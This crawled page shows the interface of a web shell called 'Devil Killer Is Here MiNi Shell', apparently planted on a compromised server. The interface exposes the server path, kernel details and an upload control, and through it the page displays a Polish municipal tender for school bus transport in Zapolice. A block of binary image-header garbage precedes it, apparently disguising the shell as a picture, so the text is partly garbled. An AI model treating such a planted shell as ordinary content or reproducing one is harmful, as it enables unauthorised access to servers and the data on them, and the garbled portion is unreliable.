JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210712/0011159501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00111595 z dnia 2021-07-12</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewóz uczniów Szkoły Podstawowej im. 4. Pułku Piechoty Legionów w Zapolicach w roku szkolnym 2021/2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZAPOLICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934482</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Strażacki 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zapolice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-161</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">438231982</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@zapolice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zapolice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewóz uczniów Szkoły Podstawowej im. 4. Pułku Piechoty Legionów w Zapolicach w roku szkolnym 2021/2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1372ae1a-e300-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00111595</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002513/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przewóz uczniów Szkoły Podstawowej im. 4 Pułku Piechoty Legionów w Zapolicach w roku szkolnym 2021/2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.zapolice.pl/?bip=2&cid=57&id=431 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl,<br/>https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wszelkie informacje w tym zakresie w szczególności dotyczące opisu przygotowania oferty oraz sposobu<br/>składania ofert, których ze względu na ograniczoną ilość znaków niniejszego formularza nie można<br/>było w nim umieścić znajdują się w Specyfikacji Warunków Zamówienia (SWZ) udostępnionej pod adresem https://bip.zapolice.pl/?bip=2&cid=57&id=431</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wszelkie informacje w tym zakresie , których ze względu na<br/>ograniczoną ilość znaków niniejszego formularza nie można było w nim umieścić znajdują się w<br/>Specyfikacji Warunków Zamówienia (SWZ) udostępnionej pod adresem https://bip.zapolice.pl/?bip=2&cid=57&id=431</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKI.271.11.2021.AZK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przewóz uczniów Szkoły Podstawowej im. 4. Pułku Piechoty Legionów w Zapolicach w roku szkolnym 2021/2022.<br/>PRZEWOZY:<br/>1)	Zapolice - Jelno - Branica – Rembieszów – Kalinowa – Ligota – Rembieszów – Woźniki - Pstrokonie - Zapolice. Długość trasy: 21,5 km, ilość kursów: 1, łączna ilość dzieci: do 49.<br/>2)	Zapolice – Strońsko – Beleń-Kolonia – Beleń – Pstrokonie – Zapolice. Długość trasy: 12,0 km, ilość kursów: 3, łączna ilość dzieci: do 110.<br/>3)	Zapolice – Jeziorko – Zapolice. Długość trasy: 12,0 km, ilość kursów: 1, łączna ilość dzieci: do 5.<br/>4)	Zapolice – Marżynek – Młodawin Dolny – Młodawin Górny – Rojków – Ptaszkowice – Zapolice. Długość trasy: 19,5 km, ilość kursów: 1, łączna ilość dzieci: do 54.<br/>5)	Zapolice – Holendry – Paprotnia – Zduńska Wola (Kępina) – Marżynek – Zapolice. Długość trasy: 22,0 km, ilość kursów: 1, łączna ilość dzieci: do 54.<br/>6)	Zapolice – Świerzyny – Zapolice. Długość trasy: 6,0 km, ilość kursów: 2, łączna ilość dzieci: do 25.<br/>7)	Zapolice – Pstrokonie – Woźniki – Rembieszów – Ligota – Kalinowa – Rembieszów – Branica – Jelno – Zapolice. Długość trasy: 21,5 km, ilość kursów: 2, łączna ilość dzieci: do 49.<br/>8)	Zapolice – Holendry – Zduńska Wola (Kępina) – Paprotnia – Marżynek – Młodawin Dolny – Młodawin Górny – Rojków – Ptaszkowice – Zapolice. Długość trasy: 25,0 km, ilość kursów: 3, łączna ilość dzieci: do 110. Zapolice – Strońsko – Beleń-Kolonia – Beleń – Pstrokonie – Zapolice. Długość trasy: 12,0 km, ilość kursów: 2, łączna ilość dzieci: do 95.<br/>9)	Zapolice – Jeziorko – Zapolice. Długość trasy: 12,0 km, ilość kursów: 1, łączna ilość dzieci: do 5. Zapolice – Świerzyny – Zapolice. Długość trasy: 6,0 km, ilość kursów: 2, łączna ilość dzieci: do 25.<br/>Zamawiający oczekuje, aby Wykonawca w formularzu cenowym określił szczegółowo stawki za przewóz uczniów na każdej trasie, przyjmując następujące szacunkowe wartości w skali roku szkolnego 2021/2022:<br/>1)	Zapolice - Jelno - Branica – Rembieszów – Kalinowa – Ligota – Rembieszów – Woźniki - Pstrokonie - Zapolice. Długość trasy: 4020,5 km.<br/>2)	Zapolice – Strońsko – Beleń-Kolonia – Beleń – Pstrokonie – Zapolice. Długość trasy: 6732,0 km.<br/>3)	Zapolice – Jeziorko – Zapolice. Długość trasy: 2244,0 km.<br/>4)	Zapolice – Marżynek – Młodawin Dolny – Młodawin Górny – Rojków – Ptaszkowice – Zapolice. Długość trasy: 3646,5 km.<br/>5)	Zapolice – Holendry – Paprotnia – Zduńska Wola (Kępina) – Marżynek – Zapolice. Długość trasy: 4114,0 km.<br/>6)	Zapolice – Świerzyny – Zapolice. Długość trasy: 2244,0 km.<br/>7)	Zapolice – Pstrokonie – Woźniki – Rembieszów – Ligota – Kalinowa – Rembieszów – Branica – Jelno – Zapolice. Długość trasy: 8041,0 km.<br/>8)	Zapolice – Holendry – Zduńska Wola (Kępina) – Paprotnia – Marżynek – Młodawin Dolny – Młodawin Górny – Rojków – Ptaszkowice – Zapolice. Długość trasy: 14025,0 km.<br/>9)	Zapolice – Strońsko – Beleń-Kolonia – Beleń – Pstrokonie – Zapolice. Długość trasy: 4488,0 km.<br/>10)	Zapolice – Jeziorko – Zapolice. Długość trasy: 2244,0 km.<br/>11)	Zapolice – Świerzyny – Zapolice. Długość trasy: 2244,0 km.<br/>Szacunkowa dzienna długość tras przewozów wynosi 289,0 km. Szacunkowa łączna długość tras przewozów w ciągu realizacji zadania wynosi 54043,0 km. Do szacunków przyjęto przelicznik: 289,0 km dziennej długości tras przewozów x 187 dni nauki szkolnej w roku szkolnym 2021/2022. Przewidywane szacowane wynagrodzenie z tytułu realizacji przedmiotu umowy może ulec zmianie (zmniejszeniu lub zwiększeniu), w zależności od liczby dni nauki szkolnej w roku szkolnym lub zmian wynikających z organizacji zajęć wpływających na ilość kursów, a także zmianę tras przewozu – ich modyfikowaniu, zwiększaniu lub umniejszaniu. <br/>W przypadku nieprzewidzianej w dacie zawarcia umowy braku całkowitej możliwości realizacji umowy, spowodowanej okolicznościami mającymi znamiona siły wyższej, wynikającymi z epidemii COVID-19 (w szczególności z restrykcji i ograniczeń wprowadzonych w związku ze stanem epidemii lub stanem zagrożenia epidemicznego w związku z COVID-19), Wykonawcy przysługuje wynagrodzenie za utrzymanie gotowości do świadczenia usługi w wysokości 1,00 zł netto (słownie: Jeden zł 00/100 netto) za kilometr, za każdy dzień, w którym usługa nie była wykonana, z przyczyn określonych w niniejszym ustępie<br/>W przypadku nieprzewidzianej w dacie zawarcia umowy braku częściowej możliwości realizacji umowy, spowodowanej okolicznościami mającymi znamiona siły wyższej, wynikającymi z epidemii COVID-19 (w szczególności z restrykcji i ograniczeń wprowadzonych w związku ze stanem epidemii lub stanem zagrożenia epidemicznego w związku z COVID-19), powodującej uszczuplenie dziennego kilometrażu o co najmniej 50 km, Wykonawcy przysługuje wynagrodzenie za utrzymanie gotowości do świadczenia usługi w wysokości 1,00 zł netto (słownie: Jeden zł 00/100 netto) za kilometr, za każdy dzień, w którym kilometraż uległ uszczupleniu o co najmniej 50 km, z przyczyn określonych w niniejszym ustępie.<br/>Z tytułu modyfikacji tras przewozu polegających na ich umniejszeniu, z powodu innego niż wskazany w ust. 4, Wykonawca nie może rościć praw do części wynagrodzenia, które przysługiwało mu przed zmianą.<br/>Zamawiający przewiduje możliwość modyfikacji postanowień umowy dotyczących wykonania jej przedmiotu, w szczególności w przypadku: <br/>1)	uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego;<br/>2)	możliwych zmian tras w podanym harmonogramie przewozów, wynikających: <br/>a) ze zmiany planów lekcji, <br/>b) ze zmiany liczby dzieci dojeżdżających z danej miejscowości, <br/>c) ze zmiany liczby miejscowości, z których organizowany jest dowóz,<br/>d) z likwidacji szkoły, <br/>e) ze zmiany organizacji pracy szkoły spowodowanej ważnymi przesłankami, jak np. remont;<br/>3)	wystąpienia zmian przepisów prawnych istotnych dla realizacji przedmiotu umowy i mających wpływ na zakres lub termin wykonania przedmiotu umowy.<br/>Wykonawca z chwilą rozpoczęcia realizacji usługi przewozowej przyjmuje na siebie pełną odpowiedzialność za czynności przewozowe i przewożonych uczniów z punktu zbiorczego do Szkoły Podstawowej im. 4. Pułku Piechoty Legionów w Zapolicach oraz ze Szkoły Podstawo-wej im. 4. Pułku Piechoty Legionów w Zapolicach do punktu zbiorczego w danej miejscowości, zgodnie z dopuszczalną ilością przewożonych uczniów. Wykonawca zobowiązany jest do zapewnienia opieki podczas wsiadania i wysiadania z pojazdu, a także w trakcie trwania przewozu, przez osobę inną niż kierowca pojazdu wykonujący kurs.<br/>Wykonawca zobowiązuje się do świadczenia usług przewozowych pojazdami oznakowanymi zgodnie z ustawą Prawo o ruchu drogowym. W przypadku awarii pojazdu, Wykonawca zobowiązuje się do przewozu uczniów zastępczymi środkami transportu, w pełni pokrywając związane z tym wydatki.<br/>2.	Zatrudnianie na podstawie stosunku pracy, zgodnie z art. 95 ust. 1 ustawy Pzp.<br/>1)	Zamawiający w oparciu o art. 95 ust. 1 ustawy Pzp wymaga, aby przez cały okres realizacji robót Wykonawca zatrudniał na podstawie stosunku pracy osoby wykonujące czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (t.j. Dz. U. z 2019 r. poz. 1040 z późn. zm.). Wymagania w tym zakresie dotyczą zatrudnienia przez Wykonawcę na podstawie stosunku pracy w szczególności kierowców oraz opiekunów przy pomocy którego realizowany będzie przedmiot zamówienia. Rodzaj czynności niezbędnych do realizacji zamówienia przez osoby zatrudnione na podstawie umowy o pracę przez Wykonawcę to kierowanie pojazdami oraz opieka nad dziećmi w czasie przewozu.. <br/>2)	Do pracowników podwykonawców zapisy o pracownikach zatrudnionych na umowę o pracę do realizacji przedmiotu zamówienia stosuje się odpowiednio. <br/>3)	Sposób kontroli i weryfikacji zatrudnienia uregulowano w projekcie umowy.<br/>3.	Zamawiający nie przewiduje możliwości składania ofert częściowych: Zamawiający nie dokonał podziału zamówienia na części. W toku przeprowadzanej analizy Zamawiający, opierając się na własnym doświadczeniu, kryteriach ekonomicznych i społecznych oraz sytuacji na rynku w okresie pandemii wirusa SARS-CoV-2 stwierdził, że taki podział groziłby nadmiernymi trudnościami technicznymi, nadmiernymi kosztami wykonania zamówienia, a także potrzebą skoordynowania działań różnych wykonawców realizujących poszczególne części zamówienia, co mogłoby poważnie zagrozić właściwemu wykonaniu zamówienia. Brak podziału na części przedmiotowego postępowania nie ogranicza udziału sektora małych i średnich przedsiębiorstw. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312110-3 - Usługi opieki dziennej nad dziećmi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1)	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu prac podobnych do prac stanowiących przedmiot niniejszego zamówienia.<br/>2)	Zamówienia, o których mowa w powyżej polegały na powtórzeniu robót zgodnych <br/>z zakresem robót stanowiącymi przedmiot niniejszego zamówienia. Zakresem robót stanowiących przedmiot zamówień, o których mowa powyżej będą prace z zakresu transportu dzieci wraz z opieką. <br/>3)	Zakres rzeczowy prac stanowiących przedmiot zamówień, o których mowa w ppkt 1 nie przekroczy wartości 10 % wartości niniejszego zamówienia.<br/>4)	Zamówienia, o których mowa w ppkt 1 będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki, a jeżeli wartość szacunkowa będzie mniejsza od kwoty, o której mowa w art. 2 ust.1 pkt 1 ustawy Pzp tylko po przeprowadzenie negocjacji.<br/>5)	Zamówienia, o których mowa w pkt 1 będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego prac, zmiana technologii lub wprowadzenia zakresu dodatkowego w przypadku gdy wystąpi potrzeba wykonania dodatkowego zakresu. <br/>6)	Zamówienie, o którym mowa w pkt 1 może obejmować rodzajowo cały lub częściowy zakres prac wskazanych w pkt. 2.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>Za najkorzystniejszą zostanie uznana oferta z najwyższą ilością punktów określonych w kryteriach.W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej ilości przyznanych punktów, wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>Zamawiający wybiera najkorzystniejszą ofertą w terminie związania ofertą określonym w SWZ.<br/>Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę , którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>8.	W przypadku braku zgody, o której mowa w ust. 7, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba, że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający odstępuje od precyzowania warunku udziału w postępowaniu dotyczącego zdolności do występowania w obrocie gospodarczym.<br/>W zakresie kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający określa następujące warunki udziału w postępowaniu: Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2021 r. poz. 919 z późn. zm.). zwaną dalej ustawą o transporcie drogowym<br/>Na potwierdzenie niniejszego warunku należy złożyć: aktualną licencję na wykonywanie krajowego transportu drogowego osób. <br/>W zakresie zdolności technicznej lub zawodowej Zamawiający określa następujące warunki udziału w postępowaniu: Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże, że:<br/>1)	nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał minimum 1 usługę polegającą na przewozie osób o wartości co najmniej 100 000 zł (słownie złotych: sto tysięcy złotych brutto) wraz z podaniem przedmiotu usługi, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączenia dowodów, czy zostały wykonane lub są wykonywane należycie. Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie wykazu usług. <br/><br/>Na potwierdzenie niniejszego warunku należy złożyć wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>Uwaga: <br/>•	Dla potrzeb oceny spełniania warunku określonego, powyżej, jeśli wartość lub wartości zostaną podane w 